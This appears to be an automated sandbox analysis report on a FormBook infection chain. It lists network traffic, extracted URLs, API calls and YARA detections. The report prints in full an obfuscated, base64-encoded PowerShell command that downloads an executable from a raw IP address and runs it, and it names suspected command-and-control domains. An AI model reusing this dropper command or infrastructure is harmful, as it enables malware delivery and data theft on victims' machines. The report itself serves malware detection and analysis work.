                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:23:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 15 Apr 2025 15:23:27 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2B6PBzXoARzKEfbf5RyIzOsVHVw5ZCnaxmp6eO9IWPU%2Fw%2B0%2BbJ3q8LX3ImB4akK9guZVopsg%2BMk1iI8qJvi%2FeTayWVX3AoVqIPmk73AZ%2BoaxfplzSsu3nVP21X70b3MppflTHsBoHQEbyw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c71b4bbe24065-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121268&min_rtt=121268&rtt_var=60634&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=862&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:23:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 15 Apr 2025 15:23:29 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SOP2nc%2BQEMofCDq2tc3QUgJ9fqd6hbAbmEJSO0QTUxJ2sCHd1Y9wK4MDCjNocuc95CBmPJM%2F4m0toJnagTJIKSBJPay8iL%2BC7Ni2ynV669tIqsoreEM2yI50FVPjNjrmnGmOPzhZcAla3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c71c56d8b987e-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124087&min_rtt=124087&rtt_var=62043&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=882&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:23:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 15 Apr 2025 15:23:32 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fb%2BJMdYR3oYtSexev4Wq6SbTfV0tHhKrhVVRmyQKazuubieQopbeokXj%2BhpPvAFWhUvBPGukO3dWlmrqeWZ33wMpgIFatVNkMM%2BQbM61dsqYhHS%2BeQMvh5Tx3iFppaJpWtDrutFkvLgxeQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c71d618ad6dda-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120966&min_rtt=120966&rtt_var=60483&sent=1&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7139&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:23:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Tue, 15 Apr 2025 15:23:35 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t5lojvT5sLtUKSn7UIBZuQwf8HQFw7%2BdgD53%2FirSwRUt7WLB2%2ByX92kdo1ydLDk73%2Fe%2F2WSrNS8h9ctd02%2BagyQ7HvvzTqI%2FA9IDh5kKQvTBiNFF%2B87C2vLZyCHzUZT9QtHFnnOPfcuSSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c71e6cb31ac95-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=122596&min_rtt=122596&rtt_var=61298&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=582&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                  Source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.21/233/igcc.e
                  Source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.21/233/igcc.exe
                  Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.21/233/igcc.exe%b
                  Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.21/233/igcc.exe)e
                  Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.21/233/igcc.exeSb
                  Source: powershell.exe, 00000003.00000002.1378744735.0000000006BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                  Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.1374616824.0000000004571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3675591492.0000000006A88000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.play-venom-rush.xyz
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3675591492.0000000006A88000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.play-venom-rush.xyz/pji1/
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3673593729.0000000004D08000.00000004.80000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666703257.0000000005E68000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.soportemx-findmy.click/ma0g?gp=1&js=1&uuid=1744730452.0012257657&other_args=eyJ1cmkiOiAiL
                  Source: AtBroker.exe, 00000010.00000002.3666703257.0000000005E68000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.soportemx-findmy.click/
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000003.00000002.1374616824.0000000004571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2X
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf(
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfxL
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: AtBroker.exe, 00000010.00000003.1838117321.000000000819B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: powershell.exe, 00000003.00000002.1377381136.00000000055DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3673593729.0000000005998000.00000004.80000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666703257.0000000006AF8000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3668565519.0000000007F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: AtBroker.exe, 00000010.00000002.3668697637.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3673593729.0000000005E4E000.00000004.80000000.00040000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666703257.0000000006FAE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.malayexpess.online/ca0u/?UV90oJV=MvRre
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00084164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00084164
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00084164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00084164
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00083F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00083F66
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,12_2_0007001C
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0009CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_0009CABC

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Detected Cobalt Strike Beacon
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: This is a third-party compiled AutoIt script.12_2_00013B3A
                  Source: igcc.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: igcc.exe, 0000000C.00000002.1362921079.00000000000C4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9632e2a0-9
                  Source: igcc.exe, 0000000C.00000002.1362921079.00000000000C4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1459977e-9
                  Source: igcc[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_988ae612-5
                  Source: igcc[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_98335124-7
                  Source: igcc.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1fe0793b-f
                  Source: igcc.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c651b88d-0
                  Powershell drops PE file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\igcc.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exeJump to dropped file
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0042CA23 NtClose,13_2_0042CA23
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A735C0 NtCreateMutant,LdrInitializeThunk,13_2_03A735C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72B60 NtClose,LdrInitializeThunk,13_2_03A72B60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_03A72DF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A74340 NtSetContextThread,13_2_03A74340
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A73090 NtSetValueKey,13_2_03A73090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A73010 NtOpenDirectoryObject,13_2_03A73010
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A74650 NtSuspendThread,13_2_03A74650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72BA0 NtEnumerateValueKey,13_2_03A72BA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72B80 NtQueryInformationFile,13_2_03A72B80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72BE0 NtQueryValueKey,13_2_03A72BE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72BF0 NtAllocateVirtualMemory,13_2_03A72BF0
